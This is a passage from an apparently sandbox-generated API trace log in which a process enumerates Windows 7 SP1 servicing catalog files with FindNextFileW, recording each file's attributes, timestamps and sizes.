ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x3ac67300, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x2602, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Anytime-Upgrade-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI4044~1.CAT")) returned 1 [0030.677] lstrlenW (lpString="Microsoft-Windows-Anytime-Upgrade-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 84 [0030.677] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6eb20ba5, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x6eb20ba5, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xae23b100, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x2172, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Anytime-Upgrade-Results-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MI32E6~1.CAT")) returned 1 [0030.677] lstrlenW (lpString="Microsoft-Windows-Anytime-Upgrade-Results-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 97 [0030.677] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x3bda274b, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x3bda274b, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x3ac67300, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x2724, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Anytime-Upgrade-Results-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI197C~1.CAT")) returned 1 [0030.677] lstrlenW (lpString="Microsoft-Windows-Anytime-Upgrade-Results-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 92 [0030.677] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x64884b99, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x64884b99, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x180700, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x306c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Backup-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MIA8CF~1.CAT")) returned 1 [0030.677] lstrlenW (lpString="Microsoft-Windows-Backup-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 80 [0030.677] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x2e2f0078, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x2e2f0078, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xbd9afe00, ftLastWriteTime.dwHighDateTime=0x1cb88e9, nFileSizeHigh=0x0, nFileSizeLow=0x60fb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Backup-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MIF331~1.CAT")) returned 1 [0030.677] lstrlenW (lpString="Microsoft-Windows-Backup-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 75 [0030.677] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x64bca9e0, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x64bca9e0, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xbb40a000, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x2bcc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-BLB-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MI0209~1.CAT")) returned 1 [0030.677] lstrlenW (lpString="Microsoft-Windows-BLB-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 84 [0030.677] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x342733e8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x342733e8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xc12e8500, ftLastWriteTime.dwHighDateTime=0x1cb88e9, nFileSizeHigh=0x0, nFileSizeLow=0x4d91, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-BLB-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI1FC1~1.CAT")) returned 1 [0030.678] lstrlenW (lpString="Microsoft-Windows-BLB-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 79 [0030.678] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x58507b71, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x58507b71, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa82dd000, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x24e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Branding-Professional-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MIC93D~1.CAT")) returned 1 [0030.678] lstrlenW (lpString="Microsoft-Windows-Branding-Professional-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 102 [0030.678] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x3ea1e2bd, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x3ea1e2bd, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x41ed8100, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x5474, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Branding-Professional-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI8EF9~1.CAT")) returned 1 [0030.678] lstrlenW (lpString="Microsoft-Windows-Branding-Professional-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 97 [0030.678] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x58423330, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x58423330, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb67bec00, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x2172, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Branding-Ultimate-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MI1A80~1.CAT")) returned 1 [0030.684] lstrlenW (lpString="Microsoft-Windows-Branding-Ultimate-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 98 [0030.684] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x413a02a9, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x413a02a9, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x516cca00, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x5474, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Branding-Ultimate-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI4C0D~1.CAT")) returned 1 [0030.684] lstrlenW (lpString="Microsoft-Windows-Branding-Ultimate-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 93 [0030.684] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5f68b563, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x5f68b563, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x56397a00, ftLastWriteTime.dwHighDateTime=0x1cb88fa, nFileSizeHigh=0x0, nFileSizeLow=0x350c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-BusinessScanning-Feature-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MICA05~1.CAT")) returned 1 [0030.684] lstrlenW (lpString="Microsoft-Windows-BusinessScanning-Feature-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 98 [0030.684] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x33724b53, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x33724b53, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x516cca00, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x4ab2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-BusinessScanning-Feature-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI3285~1.CAT")) returned 1 [0030.684] lstrlenW (lpString="Microsoft-Windows-BusinessScanning-Feature-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 93 [0030.684] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5560489b, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x5560489b, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x14a8cf00, ftLastWriteTime.dwHighDateTime=0x1cb88fa, nFileSizeHigh=0x0, nFileSizeLow=0x22f5d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Client-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MIA162~1.CAT")) returned 1 [0030.684] lstrlenW (lpString="Microsoft-Windows-Client-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 88 [0030.684] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x33286e5, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x33286e5, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x14a0d300, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x9b12a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Client-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI5C68~1.CAT")) returned 1 [0030.684] lstrlenW (lpString="Microsoft-Windows-Client-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 83 [0030.684] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5dfa2178, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x5dfa2178, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x170b2900, ftLastWriteTime.dwHighDateTime=0x1cb88fa, nFileSizeHigh=0x0, nFileSizeLow=0x6901f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MI1B4B~1.CAT")) returned 1 [0030.684] lstrlenW (lpString="Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 89 [0030.684] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x1bebf1de, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x1bebf1de, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x15d20000, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0xd62d1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI5116~1.CAT")) returned 1 [0030.684] lstrlenW (lpString="Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 84 [0030.684] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x4257a7ca, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x4257a7ca, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x92b8a600, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x1ce2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Client-LanguagePack-Package-wrapper~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MI928B~1.CAT")) returned 1 [0030.684] lstrlenW (lpString="Microsoft-Windows-Client-LanguagePack-Package-wrapper~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 101 [0030.684] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x42612d4b, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x42612d4b, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x32296900, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x1ce2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Client-LanguagePack-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MICFFA~1.CAT")) returned 1 [0030.684] lstrlenW (lpString="Microsoft-Windows-Client-LanguagePack-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 93 [0030.684] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5039036, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x5039036, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x6c950500, ftLastWriteTime.dwHighDateTime=0x1cb88fd, nFileSizeHigh=0x0, nFileSizeLow=0x1ce2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Client-Refresh-LanguagePack-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MID6B3~1.CAT")) returned 1 [0030.684] lstrlenW (lpString="Microsoft-Windows-Client-Refresh-LanguagePack-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 101 [0030.684] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x56cc7b25, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x56cc7b25, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xba0f7300, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x2836, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Client-Wired-Network-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MI2A57~1.CAT")) returned 1 [0030.684] lstrlenW (lpString="Microsoft-Windows-Client-Wired-Network-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 102 [0030.684] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x60faeba, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x60faeba, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x110d4c00, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x284e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Client-Wired-Network-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MIE8C6~1.CAT")) returned 1 [0030.684] lstrlenW (lpString="Microsoft-Windows-Client-Wired-Network-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 97 [0030.684] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x641146cc, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x641146cc, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x276ed400, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x2172, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-ClipsInTheLibrary-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MICA07~1.CAT")) returned 1 [0030.684] lstrlenW (lpString="Microsoft-Windows-ClipsInTheLibrary-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 91 [0030.684] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x2c9f194a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x2c9f194a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xae1bb500, ftLastWriteTime.dwHighDateTime=0x1cb88e9, nFileSizeHigh=0x0, nFileSizeLow=0x2846, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-ClipsInTheLibrary-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI5A20~1.CAT")) returned 1 [0030.691] lstrlenW (lpString="Microsoft-Windows-ClipsInTheLibrary-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 86 [0030.692] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x3a0c5c56, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x3a0c5c56, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xba077700, ftLastWriteTime.dwHighDateTime=0x1cb88e9, nFileSizeHigh=0x0, nFileSizeLow=0x3288, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-CodecPack-Basic-Encoder-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MIE32A~1.CAT")) returned 1 [0030.692] lstrlenW (lpString="Microsoft-Windows-CodecPack-Basic-Encoder-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 92 [0030.692] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x420457a0, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x420457a0, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x3f05d00, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x1ce2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-CodecPack-Basic-Package-wrapper~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MIB8B4~1.CAT")) returned 1 [0030.692] lstrlenW (lpString="Microsoft-Windows-CodecPack-Basic-Package-wrapper~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 92 [0030.692] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5e06085a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x5e06085a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xc03c900, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x23be, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-CodecPack-Basic-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MIC384~1.CAT")) returned 1 [0030.692] lstrlenW (lpString="Microsoft-Windows-CodecPack-Basic-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 89 [0030.692] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x39f6eff3, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x39f6eff3, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x3f05d00, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0xe621, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-CodecPack-Basic-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MIC5BA~1.CAT")) returned 1 [0030.692] lstrlenW (lpString="Microsoft-Windows-CodecPack-Basic-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 84 [0030.692] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x567dedbc, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x567dedbc, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x145c0400, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x19ad9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Common-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MIE7EE~1.CAT")) returned 1 [0030.692] lstrlenW (lpString="Microsoft-Windows-Common-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 88 [0030.692] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x47b04cb, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x47b04cb, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x516cca00, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x2209b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Common-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI24C9~1.CAT")) returned 1 [0030.692] lstrlenW (lpString="Microsoft-Windows-Common-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 83 [0030.692] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x56c55704, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x56c55704, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x47eb5e00, ftLastWriteTime.dwHighDateTime=0x1cb88fa, nFileSizeHigh=0x0, nFileSizeLow=0x5a4e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Common-Modem-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MI4862~1.CAT")) returned 1 [0030.692] lstrlenW (lpString="Microsoft-Windows-Common-Modem-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 94 [0030.692] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6062939, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x6062939, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb673f000, ftLastWriteTime.dwHighDateTime=0x1cb88e9, nFileSizeHigh=0x0, nFileSizeLow=0x1a933, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Common-Modem-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MIC1F3~1.CAT")) returned 1 [0030.692] lstrlenW (lpString="Microsoft-Windows-Common-Modem-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 89 [0030.692] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x33b02f1a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x33b02f1a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xacea8800, ftLastWriteTime.dwHighDateTime=0x1cb88e9, nFileSizeHigh=0x0, nFileSizeLow=0x2172, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-DesktopWindowManager-uDWM-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MIDC5E~1.CAT")) returned 1 [0030.692] lstrlenW (lpString="Microsoft-Windows-DesktopWindowManager-uDWM-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 94 [0030.692] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x709542fd, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x709542fd, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9c420e00, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x23be, dwReserved0=0x0, dwReserved1=0x0, 